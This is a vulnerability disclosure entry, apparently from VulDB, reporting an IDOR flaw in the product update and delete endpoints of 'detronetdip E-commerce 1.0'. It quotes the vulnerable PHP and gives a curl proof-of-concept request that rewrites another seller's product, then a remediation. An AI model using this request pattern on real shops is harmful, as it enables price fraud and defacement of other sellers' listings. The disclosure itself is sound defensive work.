Submit #754030: detronetdip E-commerce 1.0 Access Control Violationinfo

Titledetronetdip E-commerce 1.0 Access Control Violation
Description**Severity:** **HIGH** (8.1) **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H` **Bug Type:** CWE-639: Authorization Bypass Through User-Controlled Key The application suffers from Critical Insecure Direct Object Reference (IDOR) vulnerabilities in the product management modules. The SQL queries used for "Delete" and "Update" operations rely solely on the `id` parameter provided in the HTTP POST request to identify which record to modify. Crucially, the backend code fails to verify if the record associated with that `id` belongs to the currently authenticated seller. Although the code retrieves the session user ID (`$_SESSION['SELLER_ID']`), it is **never utilized in the WHERE clause** of the SQL update/delete statement. This creates a "Horizontal Privilege Escalation" scenario where any authenticated seller can manipulate or delete products belonging to any other seller simply by iterating through sequential Product IDs. ### Vulnerable Files * `seller/assets/backend/product/product_delete.php` (Arbitrary Deletion) * `seller/assets/backend/product/updateproduct.php` (Arbitrary Price/Content Manipulation) ### Vulnerable Code Analysis **File:** `seller/assets/backend/product/updateproduct.php` ```php // The input ID is sanitized against SQLi but not validated for ownership. $id=get_safe_value($con,$_POST['id']); // The logged-in seller's ID is retrieved but IGNORED in the logic below. $added_by= $_SESSION['SELLER_ID']; // FLAW: The UPDATE query targets the row based ONLY on 'id'. // There is no check like "AND seller_id = '$added_by'". $qyery="update product set product_name='$name', price='$price'... where id='$id'"; if(mysqli_query($con,$qyery)){ // ... } ``` ### Exploit Proof of Concept (PoC) **Scenario:** An attacker targets Product ID `10` (owned by a victim seller) and modifies its price to `1`, its name to "HACKED", and its stock quantity. **Exploit Command:** ```bash curl -X POST \ -H "Cookie: PHPSESSID=d14c5dd7d7b75b3665ec97ff405915b3" \ -d "id=10" \ -d "name=Iphone_15_Pro_Max_HACKED" \ -d "price=1000" \ -d "sellprice=1" \ -d "quantity=10" \ -d "category=1" \ -d "subcat=1" \ -d "description=Hacked_by_Nixon" \ "http://localhost:3000/seller/assets/backend/product/updateproduct.php" ``` **Output:** The JSON response confirms the successful modification of the victim's product. ```json {"code":1,"id":"10"} ``` ### Impact * **Financial Fraud:** Attackers can drastically reduce prices of high-value items (e.g., to $0 or $1) and purchase them, causing direct financial loss to other sellers. * **Marketplace Defacement:** Attackers can deface the platform by changing product names and descriptions to offensive content or spam. * **Denial of Service:** Attackers can delete the entire product catalog of the platform by iterating through all possible IDs in a loop script. ## Remediation Recommendations ### Implement Access Control (IDOR Fix) To mitigate IDOR, all database queries must include an ownership check. The SQL `WHERE` clause must bind the action to the currently logged-in user. * *Vulnerable:* `UPDATE product SET ... WHERE id = '$id'` * *Secure:* `UPDATE product SET ... WHERE id = '$id' AND seller_id = '$_SESSION[SELLER_ID]'`
Source⚠️ https://github.com/Nixon-H/Ecommerce-IDOR-Product-Manipulation
User
 Nixon-H (UID 95173)
Submission02/07/2026 16:55 (4 months ago)
Moderation02/18/2026 15:10 (11 days later)
StatusAccepted
VulDB entry346486 [detronetdip E-commerce 1.0.0 Product Management Delete/Update ID authorization]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!